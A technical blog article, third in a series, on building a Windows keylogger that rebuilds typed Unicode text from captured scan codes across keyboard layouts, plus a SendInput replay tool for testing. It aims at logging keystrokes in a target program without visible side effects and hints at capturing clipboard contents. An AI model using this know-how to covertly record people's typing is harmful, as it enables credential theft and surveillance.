Writing a decent win32 keylogger [3/3]

Written by Martin Balc'h - 21/12/2023 - in Tools, System - Download

In this series of articles, we talk about the ins and outs of building a keylogger for Windows that supports all keyboard layouts and reconstructs Unicode characters correctly regardless of the language (excluding those using input method editors).

In the first part, after a brief introduction to the concepts of scan codes, virtual keys, characters and glyphs, we describe three different ways to capture keystrokes (GetKeyState, SetWindowsHookEx, GetRawInputData) and the differences between those techniques.

In the second part, we detail how Windows stores keyboard layout information in the kbd*.dll files and how to parse them.

In the third and last part, we go through the process of using the extracted information to convert scan codes into characters and all the tricky cases presented by different layouts, such as ligatures, dead keys, extra shift-states and SGCAPS.
Finally, we present our methodology to test and validate that our reconstruction is correct by writing a testing tool which can automate the injection of scan codes and retrieve the reference text produced by Windows which we compare with our reconstructed text.


In this last installment of our Writing a decent Win32 keylogger series, we use the techniques described in the first and second articles to complete our scan code to character reconstruction process.

Reconstruction process

High level view

Now that we have a pretty clear picture of what goes on in these DLLs, let’s write a reconstruction algorithm. We will use the Python programming language and assume that we already have a variable called layout that holds the result of json.loads() applied to the content of the JSON file for the current keyboard layout.

Let’s start with a high level view of the process:

For each input event:

  1. Convert the scan code (and extended flags) to a virtual key using the pusVSCtoVK, pVSCtoVK_E0 and pVSCtoVK_E1 lookup tables.
  2. Update the current shift state based on the latest key press or key release.
    1. Handle left and right handed versions of shift state modifiers.
    2. Handle LOCK keys (capslock, numlock, etc.)
  3. Look up the output character(s) from pVkToWcharTable based on our input virtual key and current shift state.
    1. Handle regular characters
    2. Handle dead characters
    3. Handle ligatures
  4. Update internal states
  5. Output 0 or more characters

The initial implementation could look like this:

events = jsonl_load('events.jsonl')     # read all input key events from file
layout = load_layout('kbdfr.json')      # load the active keyboard layout
# prepare a state object that keeps track of which keys are currently pressed and a buffer for dead chars
state = {
    'vk':           [ 0 for i in range(0x100) ],
    'dead':         None,
    'capslock':     0,
    'numlock':      1,       # assume we start with numlock ON (default for windows)
    'scrolllock':   0,
}
out = ''                                # reconstructed text
# process all events
for evt in events:
    # sc_to_vk returns both the virtual key and its name
    vk, vkn = sc_to_vk(evt['sc'], evt['e0'], evt['e1'], state, layout)
    if vk is None:
        # unsupported scan code for this layout
        continue
    shiftstate = update_shiftstate(vk, state, layout)
    col = shiftstate_to_column(shiftstate, layout)
    if evt['keyup']:
        # output characters only when the key is pressed, not when it is released
        continue
    ch, dead = vk_to_chars(vk, col, layout)
    out += output_char(ch, dead, vk, state, layout)
# print output
print(out)

Now let’s see in more detail how we can implement those steps, starting with the scan code to virtual key conversion.

Scan code to virtual key conversion

def sc_to_vk(sc, e0, e1, state, layout) -> (int, str):

    # check in vsc_to_vk map first
    for it in layout['vsc_to_vk']:
        if it['sc'] == sc:
            # skip this entry if it has the "extended flags" and neither E0 nor E1 are set
            if 'KBDEXT' in it['flags'] and not e0 and not e1:
                continue
            # E0 or E1 but no KBDEXT flag, skip that one too
            elif 'KBDEXT' not in it['flags'] and (e0 or e1):
                continue
            # found a matching entry, return the virtual key and its name
            return it['vk'], it['vkn']

    # check extended scan codes
    if e0:
        for it in layout['vsc_to_vk_e0']:
            if it['sc'] == sc:
                return it['vk'], it['vkn']
    if e1:
        for it in layout['vsc_to_vk_e1']:
            if it['sc'] == sc:
                return it['vk'], it['vkn']

    # no match, unsupported scan code for this layout
    return None, None

It is important to go through the non-extended lookup table even when E0 and E1 are set as some entries have the KBDEXT flag. Our initial (naive) implementation just went through one of the tables based on the E0 and E1 flag values, but it missed keys (such as right shift).
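To make the difference concrete, here is a small self-contained sketch comparing the naive table selection with the full lookup. The toy layout and the function names naive_sc_to_vk and full_sc_to_vk are made up for illustration; only the field names mirror the JSON used above.

```python
# Toy layout extract (made up for illustration, same field names as above).
TOY_LAYOUT = {
    'vsc_to_vk': [
        {'sc': 0x1E, 'vk': 0x41, 'vkn': 'A', 'flags': []},
        {'sc': 0x36, 'vk': 0xA1, 'vkn': 'VK_RSHIFT', 'flags': ['KBDEXT']},
    ],
    'vsc_to_vk_e0': [{'sc': 0x1D, 'vk': 0xA3, 'vkn': 'VK_RCONTROL'}],
    'vsc_to_vk_e1': [],
}

def naive_sc_to_vk(sc, e0, e1, layout):
    """Pick exactly one table from the E0/E1 flags (the approach that misses keys)."""
    key = 'vsc_to_vk_e0' if e0 else 'vsc_to_vk_e1' if e1 else 'vsc_to_vk'
    for it in layout[key]:
        if it['sc'] == sc:
            return it['vkn']
    return None

def full_sc_to_vk(sc, e0, e1, layout):
    """Search the main table first (honouring KBDEXT), then the E0/E1 tables."""
    ext = bool(e0 or e1)
    for it in layout['vsc_to_vk']:
        # an entry matches only if its KBDEXT flag agrees with the event
        if it['sc'] == sc and ('KBDEXT' in it['flags']) == ext:
            return it['vkn']
    for flag, key in ((e0, 'vsc_to_vk_e0'), (e1, 'vsc_to_vk_e1')):
        if flag:
            for it in layout[key]:
                if it['sc'] == sc:
                    return it['vkn']
    return None

print(naive_sc_to_vk(0x36, True, False, TOY_LAYOUT))  # None
print(full_sc_to_vk(0x36, True, False, TOY_LAYOUT))   # VK_RSHIFT
```

With this toy data, the naive version only looks at the E0 table and finds nothing, while the full version picks up the KBDEXT entry from the main table.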

Shift states

Now based on the virtual key that is pressed or released, we can update our current shift state, which means figuring out what is the current combination of “control”, “shift”, “alt” (and some other) keys. Here is what we can do:

  1. Keep track of the status of NUMLOCK, CAPSLOCK and SCROLLLOCK keys.
  2. Adjust the values of right/left handed modifiers to the generic versions (VK_RCONTROL => VK_CONTROL, VK_LCONTROL => VK_CONTROL, same for SHIFT and MENU)
  3. If the current keyboard layout has the ALT-GR flag, then handle VK_RMENU as both VK_MENU and VK_CONTROL.
  4. Update our internal state to keep track of which virtual keys are currently pressed.
  5. Go through all modifier virtual keys for this layout and calculate the current shift state.
  6. Convert the shift state value to a column index in the vk_to_wchars tables.

Here is an extract of the relevant code for the last 2 steps:

shiftstate = 0
for mod in layout['modifiers']:
    if state['vk'][mod['vk']]:
        shiftstate |= mod['modbits']
col = layout['shiftstates'][shiftstate]
if col == 15:
    # invalid shiftstate
    ...
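The first steps of the list are not shown in the extract above. A minimal sketch of how all of them could fit together is given below. It is not the code from the repository: the keyup parameter and the 'altgr' layout field are assumptions made for this example, and it simplifies things by clearing the generic modifier as soon as either the left or the right key is released, and by ignoring auto-repeat on lock keys.

```python
# Virtual key codes from winuser.h
VK_SHIFT, VK_CONTROL, VK_MENU = 0x10, 0x11, 0x12
VK_CAPITAL, VK_NUMLOCK, VK_SCROLL = 0x14, 0x90, 0x91
VK_LSHIFT, VK_RSHIFT = 0xA0, 0xA1
VK_LCONTROL, VK_RCONTROL = 0xA2, 0xA3
VK_LMENU, VK_RMENU = 0xA4, 0xA5

# left/right handed modifiers and their generic counterpart
GENERIC = {VK_LSHIFT: VK_SHIFT, VK_RSHIFT: VK_SHIFT,
           VK_LCONTROL: VK_CONTROL, VK_RCONTROL: VK_CONTROL,
           VK_LMENU: VK_MENU, VK_RMENU: VK_MENU}
LOCKS = {VK_CAPITAL: 'capslock', VK_NUMLOCK: 'numlock', VK_SCROLL: 'scrolllock'}

def update_shiftstate(vk, keyup, state, layout):
    """Record a key press/release in state and return the resulting shift state."""
    # 1. lock keys toggle on key press only
    if vk in LOCKS and not keyup:
        state[LOCKS[vk]] ^= 1
    # 2. map handed modifiers to their generic version
    vks = [GENERIC.get(vk, vk)]
    # 3. on ALT-GR layouts, right ALT also counts as CONTROL
    #    ('altgr' is an assumed field name, not taken from the article)
    if vk == VK_RMENU and layout.get('altgr'):
        vks.append(VK_CONTROL)
    # 4. remember which virtual keys are currently down
    for k in vks:
        state['vk'][k] = 0 if keyup else 1
    # 5. OR together the bits of every modifier currently held
    shiftstate = 0
    for mod in layout['modifiers']:
        if state['vk'][mod['vk']]:
            shiftstate |= mod['modbits']
    return shiftstate
```

Because the modifier list comes from the layout itself, any extra modifier key declared by a layout is picked up by step 5 without special handling.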

Virtual key to characters

Now we have everything we need to perform a lookup in the PVK_TO_WCHAR_TABLE. Here’s our annotated code to handle it:

def vk_to_chars(vk, col, layout) -> tuple:
    '''
        The first item of the returned tuple is the output wchar_t value as an int.
        The second value is always None, except if the 1st value is WCH_DEAD,
            in which case the 2nd value is the dead character.
        Note: the capslock status is read from the global state object.
    '''
    # go through all the sub tables
    for vkmap in layout['vk_to_wchars']:
        # skip tables not containing enough columns (one or more shift states)
        if col >= vkmap['num_mods']:
            continue

        # go through all entries
        for i in range(len(vkmap['table'])):
            it = vkmap['table'][i]

            # does this entry match the current virtual key?
            if it['vk'] == vk:

                # here we handle a couple tricky cases

                # regular CAPSLOCK, code assumes VK_SHIFT is modifier with bit 1
                # (which is the case for all keymaps shipped in windows)
                # attrs is a bit field, so the flag is tested with & rather than ==
                if it['attrs'] & CAPLOK and not col and state['capslock']:
                    # capslock is engaged, the key has the CAPLOK flag
                    # adjust the column as if VK_SHIFT was pressed
                    col = 1

                # skip the SGCAPS entry if CAPSLOCK is on, the next entry for
                # the same virtual key holds the capslock characters
                if it['attrs'] & SGCAPS and state['capslock']:
                    continue

                # handle dead characters
                if it['wch'][col] == WCH_DEAD:
                    # also return the associated dead key
                    return it['wch'][col], vkmap['table'][i+1]['wch'][col]

                # regular case, we can just return the char value
                return it['wch'][col], None
    # nothing found
    return None, None

There is something we need to explain here about the handling of the WCH_DEAD case. When we get the magic value WCH_DEAD, we need to look at the next entry in the table to find out the value of the dead character. The capslock and SGCAPS lines will be detailed later on in the "Tricky cases" section of this article.
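The "next entry" rule is easier to see on a concrete pair of rows. The sketch below uses two illustrative rows, loosely modelled on a French-style circumflex / diaeresis key; the exact values and the lookup helper name are assumptions for this example, only the WCH_* constants come from kbd.h.

```python
WCH_NONE = 0xF000   # magic values from kbd.h
WCH_DEAD = 0xF001

# Illustrative rows: the first one only says "this is a dead key",
# the row right after it holds the actual dead characters.
ROWS = [
    {'vk': 0xDD, 'attrs': 0, 'wch': [WCH_DEAD, WCH_DEAD, WCH_NONE]},
    {'vk': 0xFF, 'attrs': 0, 'wch': [0x5E, 0xA8, WCH_NONE]},   # '^' and '¨'
]

def lookup(rows, vk, col):
    """Return (wchar, dead_char); dead_char is read from the following row."""
    for i, row in enumerate(rows):
        if row['vk'] != vk:
            continue
        wch = row['wch'][col]
        if wch == WCH_DEAD:
            return wch, rows[i + 1]['wch'][col]
        return wch, None
    return None, None

wch, dead = lookup(ROWS, 0xDD, 0)
print(hex(wch), chr(dead))   # 0xf001 ^
```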

Output

The previous function can return the following values:

  • WCH_NONE: there is nothing to output
  • WCH_DEAD: there is nothing to output, the dead character must be stored for the next input event
  • WCH_LGTR: there is more than one character to output
  • unicode code point: there is exactly one character to output (in addition to any buffered dead char)

However, we also need to take into consideration potential buffered dead characters. Our algorithm to handle new characters to output is the following:

    output = []

    if current_char is WCH_NONE
        abort

    if buffered_dead_char
        combined_char = is_valid_deadchar_combination(buffered_dead_char, current_char, layout)

        // support for chained dead chars
        if combined_char and current_char is dead_char
            set buffered_dead_char = combined_char
            abort

        if combined_char
            output += [ combined_char ]
        else
            // bad deadchar combination
            output += [ buffered_dead_char, current_char ]

        set buffered_dead_char = none

    else if current_char is dead_char
        set buffered_dead_char = current_char

    else if current_char is ligature
        output += vk_to_ligature(current_char_vk) // this function returns an array of characters

    else
        // regular character
        output += [ current_char ]

    for each character in output
        print character

… And we finally print out the reconstructed text stream!
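For reference, the pseudocode above could be written in Python roughly as follows. This is a sketch under assumptions rather than the repository's code: the dead key table is modelled as a plain dictionary mapping (dead char, base char) to the composed char, and the ligature characters are passed in by the caller.

```python
WCH_NONE, WCH_DEAD, WCH_LGTR = 0xF000, 0xF001, 0xF002   # magic values from kbd.h

def output_char(ch, dead, state, deadkeys, ligature=()):
    """Return the code points to emit for one key press, updating state['dead']."""
    if ch is None or ch == WCH_NONE:
        return []
    is_dead = (ch == WCH_DEAD)
    current = dead if is_dead else ch
    buffered = state['dead']
    if buffered is not None:
        combined = deadkeys.get((buffered, current))
        if combined is not None and is_dead:
            # chained dead chars: keep waiting with the new dead char
            state['dead'] = combined
            return []
        state['dead'] = None
        if combined is not None:
            return [combined]
        # bad combination: both characters are emitted
        return [buffered, current]
    if is_dead:
        state['dead'] = current
        return []
    if ch == WCH_LGTR:
        return list(ligature)
    return [ch]

state = {'dead': None}
deadkeys = {(ord('^'), ord('e')): ord('ê')}   # hypothetical one-entry table
out = []
out += output_char(WCH_DEAD, ord('^'), state, deadkeys)   # buffered, nothing emitted
out += output_char(ord('e'), None, state, deadkeys)       # valid combination
out += output_char(WCH_DEAD, ord('^'), state, deadkeys)
out += output_char(ord('z'), None, state, deadkeys)       # bad combination
print(''.join(map(chr, out)))   # ê^z
```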

Tricky cases

Now we will focus on a few tricky edge cases we encountered during this research.

Numpad keys

In the vsc_to_vk tables, all numpad keys have both KBDSPECIAL and KBDNUMPAD flags - which means Windows does some special processing - but unfortunately, they always only point to the non-numlock virtual keys. So for the numpad key 0, the only entry we have points to VK_INSERT and never VK_NUMPAD0. This is a bit annoying as it forces us to add a special handling case and “fix” the virtual key value after our conversion from scan code. Here is the implementation:

def fix_numpad_vk(vk, state):
    '''
        numpad keys are handled differently, the mapping towards VK_NUMPAD*
        is not present in the keyboard layout dlls, just the one to VK_INSERT, ...
        so fix it manually :/
    '''
    if not state['numlock']:
        return vk
    fix_map = {
        VK_INSERT:    VK_NUMPAD0,
        VK_END:       VK_NUMPAD1,
        VK_DOWN:      VK_NUMPAD2,
        VK_NEXT:      VK_NUMPAD3,
        VK_LEFT:      VK_NUMPAD4,
        VK_CLEAR:     VK_NUMPAD5,
        VK_RIGHT:     VK_NUMPAD6,
        VK_HOME:      VK_NUMPAD7,
        VK_UP:        VK_NUMPAD8,
        VK_PRIOR:     VK_NUMPAD9,
    }
    if vk in fix_map:
        return fix_map[vk]
    return vk

Extra shift states

Most keyboard layouts use the standard SHIFT, CONTROL and ALT modifiers and quite a few use ALT-GR, which is handled as CONTROL + ALT. So only 3 modifier keys are used in most cases, but not all of them!

A good example is KBDCAN.DLL, which handles the “Canadian Multilingual Standard” layout and supports typing English, French and a few other languages. On that layout, the right control key maps to VK_OEM_8 instead of the usual VK_RCONTROL and can also be combined with VK_SHIFT to produce additional characters.

The algorithm and code described previously for the shift state calculation does handle those extra modifier keys.

Chained dead keys

We talked about dead keys quite a bit already, but there is a case we haven’t covered yet that can happen in at least two keyboard layouts: chained dead chars. Both “Cherokee Phonetic” and “French (Standard, BÉPO)” have the ability to chain dead keys. Here is an example for Cherokee:

Key strokes   | Output character | Comments
q + o         |                  | regular dead key with 2 key presses
d + s + SPACE |                  | chained dead keys
d + s + i     |                  | chained dead keys

The support of this feature complicates the processing of dead chars and of output a little bit. Notably, you have to update your dead char buffer accordingly, keeping in mind that there will always be only one dead character in the buffer, but that it will change upon the second keypress.

Ligatures

As we saw earlier, a single keypress can generate up to five distinct unicode characters. There is no inherent difficulty in processing them, as our simple code can attest:

def vk_to_ligature(vk, modnum, layout):
    for lig in layout['ligatures']:
        if lig['vk'] == vk and modnum == lig['modnum']:
            return lig['chars']
    return None

...
print(''.join(vk_to_ligature(...)))

SGCAPS

SGCAPS stands for “Swiss German Capitals”. In this layout (and some others, mostly for Eastern European languages), holding SHIFT and having CAPSLOCK on are not equivalent. For example, let’s take the key VK_OEM_1, which has a whopping five labeled characters:

  • ü, when neither shift nor capslock are engaged
  • Ü, when CAPSLOCK is on (but shift is not)
  • è, when SHIFT is on (but CAPSLOCK is not)
  • È, when both SHIFT and CAPSLOCK are on
  • [, when only ALT-GR is on

Let’s see an annotated extract of the vk_to_wchars table in kbdsg.json that refers to that specific virtual key.

{ "attrs": 2, "vk": 186, "vkn": "VK_OEM_1", "wch": [ 252 /* ü */, 232 /* è */, 91/* [ */, 27/* ESC */ ] }, 
{ "attrs": 0, "vk": 186, "vkn": "VK_OEM_1", "wch": [ 220 /* Ü */, 200 /* È */, 91/* [ */, 27/* ESC */ ] },

As you can see, we have two entries for the same virtual key, and the first entry has the SGCAPS flag (0x2). When processing such entries, you must remember to skip them if CAPSLOCK is engaged and go to the next one (without the SGCAPS flag).
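The two rows above are enough to check the four SHIFT / CAPSLOCK combinations. Here is a minimal sketch of the selection rule applied to that extract; the helper name sgcaps_lookup is made up for this example.

```python
SGCAPS = 0x02   # attribute flag from kbd.h

# The two VK_OEM_1 rows from the kbdsg.json extract shown above
ROWS = [
    {'attrs': 2, 'vk': 186, 'wch': [252, 232, 91, 27]},
    {'attrs': 0, 'vk': 186, 'wch': [220, 200, 91, 27]},
]

def sgcaps_lookup(rows, vk, col, capslock):
    """Return the character for vk/col, skipping SGCAPS rows when capslock is on."""
    for row in rows:
        if row['vk'] != vk:
            continue
        if row['attrs'] & SGCAPS and capslock:
            continue   # the next row for the same key holds the capslock variants
        return chr(row['wch'][col])
    return None

for capslock in (False, True):
    for col in (0, 1):   # column 0: no modifier, column 1: SHIFT
        print(capslock, col, sgcaps_lookup(ROWS, 186, col, capslock))
# False 0 ü
# False 1 è
# True 0 Ü
# True 1 È
```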

Building a test program

In order to speed up testing and debugging, we wrote a simple win32 Python program which can be fed our keylogger’s output, which will then emulate the key-presses and retrieve the characters sent to the program by Windows. This gives us a frame of reference to validate our reconstruction.

Sending input events

To emulate input events, Windows offers the function SendInput which is defined as:

UINT SendInput(UINT cInputs, LPINPUT pInputs, int cbSize);

This function can be used to send multiple INPUT structures which are basically a union of MOUSEINPUT, KEYBDINPUT and HARDWAREINPUT. We will only send events of type KEYBDINPUT in our test program. Here is the structure’s definition:

typedef struct tagKEYBDINPUT {
  WORD      wVk;
  WORD      wScan;
  DWORD     dwFlags;
  DWORD     time;
  ULONG_PTR dwExtraInfo;
} KEYBDINPUT, *PKEYBDINPUT, *LPKEYBDINPUT;

To simulate key-presses, we only need to fill the wScan (scan code) and dwFlags members. It is important to set the KEYEVENTF_SCANCODE flag, or else the wVk (virtual key) member will be used instead of wScan. Additionally, we conditionally set the KEYEVENTF_EXTENDEDKEY flag for E0 / E1 scan codes and the KEYEVENTF_KEYUP flag to indicate a key release.

Here is the python code that uses ctypes to call SendInput to inject key presses:

from ctypes import *
from ctypes import wintypes as w

# required flags / defines
KEYEVENTF_EXTENDEDKEY = 0x1
KEYEVENTF_KEYUP = 0x2
KEYEVENTF_UNICODE = 0x4
KEYEVENTF_SCANCODE = 0x8
INPUT_KEYBOARD = 1

# not defined by wintypes
ULONG_PTR = c_ulong if sizeof(c_void_p) == 4 else c_ulonglong

class KEYBDINPUT(Structure):
    _fields_ = [('wVk' ,w.WORD),
                ('wScan',w.WORD),
                ('dwFlags',w.DWORD),
                ('time',w.DWORD),
                ('dwExtraInfo',ULONG_PTR)]

class MOUSEINPUT(Structure):
    _fields_ = [('dx' ,w.LONG),
                ('dy',w.LONG),
                ('mouseData',w.DWORD),
                ('dwFlags',w.DWORD),
                ('time',w.DWORD),
                ('dwExtraInfo',ULONG_PTR)]

class HARDWAREINPUT(Structure):
    _fields_ = [('uMsg' ,w.DWORD),
                ('wParamL',w.WORD),
                ('wParamH',w.WORD)]

class DUMMYUNIONNAME(Union):
    _fields_ = [('mi',MOUSEINPUT),
                ('ki',KEYBDINPUT),
                ('hi',HARDWAREINPUT)] 

class INPUT(Structure):
    _anonymous_ = ['u']
    _fields_ = [('type',w.DWORD),
                ('u',DUMMYUNIONNAME)]

user32 = WinDLL('user32')
user32.SendInput.argtypes = w.UINT, POINTER(INPUT), c_int
user32.SendInput.restype = w.UINT

def send_scancode(code, up, ext):
    ''' uses SendInput to send a specified scancode, setting the appropriate flags for key up/down and e0/e1 extended flags '''
    i = INPUT()
    i.type = INPUT_KEYBOARD
    i.ki = KEYBDINPUT(0, code, KEYEVENTF_SCANCODE, 0, 0)
    if up:
        i.ki.dwFlags |= KEYEVENTF_KEYUP
    if ext:
        i.ki.dwFlags |= KEYEVENTF_EXTENDEDKEY

    return user32.SendInput(1, byref(i), sizeof(INPUT)) == 1

We can now use the function send_scancode, specifying the scan code, whether the key is pressed or released, and whether it’s an extended scan code or not.
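Replaying a whole capture is then a simple loop over the recorded events. The sketch below is one possible way to do it; the replay helper and its delay parameter are hypothetical, and the sender is passed in as a callable so that the loop can be tried out without touching SendInput. Events are assumed to use the same sc / e0 / e1 / keyup fields as in the reconstruction code.

```python
import time

def replay(events, send, delay=0.0):
    """Replay recorded events through send(code, up, ext); return how many succeeded."""
    sent = 0
    for evt in events:
        # E0 and E1 both translate to the single "extended" flag of the sender
        ext = bool(evt.get('e0') or evt.get('e1'))
        if send(evt['sc'], bool(evt['keyup']), ext):
            sent += 1
        if delay:
            time.sleep(delay)   # optional pause between injected events
    return sent

# Dry run with a fake sender that only records the calls
calls = []
def fake_send(code, up, ext):
    calls.append((code, up, ext))
    return True

events = [
    {'sc': 0x1E, 'e0': 0, 'e1': 0, 'keyup': 0},   # key press
    {'sc': 0x1E, 'e0': 0, 'e1': 0, 'keyup': 1},   # key release
]
print(replay(events, fake_send))   # 2
```

On Windows, the same loop could be driven with replay(events, send_scancode, delay=0.01).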

Switching the keyboard layout

To speed up testing, we wanted to be able to change input languages on the fly with no manual GUI action. We first experimented with ActivateKeyboardLayout and other functions but it did not work in the end due to the fact that keyboard layouts are bound to threads, and to be more accurate, to the thread responsible for the creation of a window (HWND). In the case of a console program, it is actually created by conhost.exe and not the running program, which makes it harder to identify the right thread (and process!).

So the method we ended up using is to simply send the window message WM_INPUTLANGCHANGEREQUEST to the foreground window, which will work as long as our program has the focus. It looks like this:

# defines
WM_INPUTLANGCHANGEREQUEST = 0x0050

# prototypes
user32.GetForegroundWindow.restype = w.HWND    # HWND is already a handle type
user32.SendMessageA.argtypes = w.HWND,w.UINT,w.WPARAM,w.LPARAM
user32.SendMessageA.restype = w.LPARAM         # LRESULT is pointer-sized, like LPARAM

def switch_layout(klid):
    '''
        uses SendMessageA to the current foreground window instead of
        ActivateKeyboardLayout / LoadKeyboardLayout which will not work
        if not called from the main thread of the current program,
        which is not the case with python ...
    '''
    return user32.SendMessageA( user32.GetForegroundWindow(), WM_INPUTLANGCHANGEREQUEST, 0, int(klid, 16)) == 0

Note: Since there is a setting in Windows allowing each window to use a different input language, you can’t rely on the keylogger’s own active layout being correct. You need to figure out the name and id of the layout that is active in the intended recipient program. We initially found the active keyboard layout (HKL) for our target and then used ActivateKeyboardLayout and GetKeyboardLayoutNameA to get the KLID before restoring the original active keyboard layout in our own context. This turned out to be a very bad idea: it had a very noticeable side effect on the target program, preventing some keys from working (alt-gr combos for example). This is why we fell back to enumerating the registry’s keyboard layouts to get the HKL / KLID / dll name correlations.
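A minimal sketch of such a registry enumeration, using Python's standard winreg module, could look like this. It only covers the KLID to dll name part (the correlation with the HKL is not shown), the function name list_keyboard_layouts is made up for this example, and on non-Windows systems it simply returns an empty result.

```python
try:
    import winreg          # only available on Windows
except ImportError:
    winreg = None

KEY_PATH = r'SYSTEM\CurrentControlSet\Control\Keyboard Layouts'

def list_keyboard_layouts():
    """Return {KLID: {'dll': ..., 'name': ...}} read from the registry."""
    layouts = {}
    if winreg is None:
        return layouts
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH) as root:
        # QueryInfoKey returns (number of subkeys, number of values, last modified)
        count = winreg.QueryInfoKey(root)[0]
        for i in range(count):
            klid = winreg.EnumKey(root, i)          # e.g. '0000040c'
            with winreg.OpenKey(root, klid) as sub:
                entry = {}
                for field, value_name in (('dll', 'Layout File'),
                                          ('name', 'Layout Text')):
                    try:
                        entry[field] = winreg.QueryValueEx(sub, value_name)[0]
                    except OSError:
                        entry[field] = None          # value missing for this layout
                layouts[klid.lower()] = entry
    return layouts

for klid, info in sorted(list_keyboard_layouts().items()):
    print(klid, info['dll'], info['name'])
```

Since this only reads the registry, it does not touch the active layout of any thread, which avoids the side effect described above.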

Putting it all together

Now we have:

  • Three different key logger programs,
  • A keymap data extractor to transform keyboard layout DLLs into more usable JSON files,
  • A replayer program to get the correct output from a list of input scan codes and a keyboard layout,
  • And a reconstruction program that can use the output of all of the others to make sure everything is processed correctly!

All the code is available on GitHub here.

Hopefully this article will help you understand a bit better how keyboard input works on Windows and how to write a good keylogger: one that supports multiple languages, that doesn’t hardcode a list of strings mapped to virtual keys, that handles dead keys, ligatures, multiple shift states and moreover, that doesn’t introduce visible side effects!

We haven't covered languages that use IMEs (input method editors), which, simply put, add another layer between the input and the windows. Given their diversity, the fact that they can use both keyboard and mouse, and the fact that they can be customized, it doesn't seem very practical to emulate them. I would recommend attacking the problem from a different angle: hooking the window messages and looking for WM_CHAR events. This way you get the correct characters directly with no added effort.

Finally, there are a few things we haven’t touched on that we could still improve. All keys that move the cursor around, such as the arrow keys, page up and page down, can affect the output. Take for instance the following input: A, LEFT, B. The resulting output would be BA and not AB. There is also the detection of CTRL-V, which you may want to handle with a call to GetClipboardData(). We’ll leave that as an exercise for the reader ;)
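As a starting point for the cursor problem, here is a small sketch of a line buffer that tracks a cursor position. It assumes a single-line text field and uses hypothetical token names (LEFT, RIGHT, HOME, END, BACK) for the non-character keys; anything else is treated as a character to insert.

```python
def apply_keys(tokens):
    """Rebuild the text of a single-line field from characters and cursor keys."""
    buf, pos = [], 0
    for tok in tokens:
        if tok == 'LEFT':
            pos = max(0, pos - 1)
        elif tok == 'RIGHT':
            pos = min(len(buf), pos + 1)
        elif tok == 'HOME':
            pos = 0
        elif tok == 'END':
            pos = len(buf)
        elif tok == 'BACK':
            # backspace removes the character before the cursor, if any
            if pos > 0:
                del buf[pos - 1]
                pos -= 1
        else:
            # regular character: insert at the cursor and move past it
            buf.insert(pos, tok)
            pos += 1
    return ''.join(buf)

print(apply_keys(['A', 'LEFT', 'B']))   # BA
```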